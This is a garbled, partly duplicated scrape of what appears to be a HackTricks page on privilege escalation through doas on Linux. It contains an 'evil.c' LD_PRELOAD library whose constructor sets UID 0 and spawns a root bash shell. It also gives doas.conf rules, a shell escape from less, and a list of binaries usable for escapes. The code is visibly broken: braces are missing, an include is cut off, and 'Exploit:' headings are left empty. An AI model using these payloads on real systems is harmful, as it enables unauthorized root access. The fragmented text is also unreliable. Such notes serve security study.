Hacktricks Doas -

// evil.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init() setuid(0); setgid(0); system("/bin/bash");

permit user1 as root cmd /usr/bin/less doas less /etc/hosts # then type: !/bin/bash Known binaries for escapes: less , more , vi , vim , nano , awk , find , man , git , tmux , screen , ftp , irb , lua , perl , python , ruby , scp , tar . If keepenv is set, doas keeps LD_PRELOAD , LD_LIBRARY_PATH , PYTHONPATH , etc. hacktricks doas

permit nopass user1 as root cmd /usr/bin/* Try: // evil

#!/bin/sh doas /usr/bin/chown user "$1" Exploit: // evil.c #include &lt

// evil.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> __attribute__((constructor)) void init() setuid(0); setgid(0); system("/bin/bash");

permit nopass user1 as root cmd /usr/bin/* Try:

#!/bin/sh doas /usr/bin/chown user "$1" Exploit:

Hacktricks Doas -

In This Section

LINKS & RESOURCES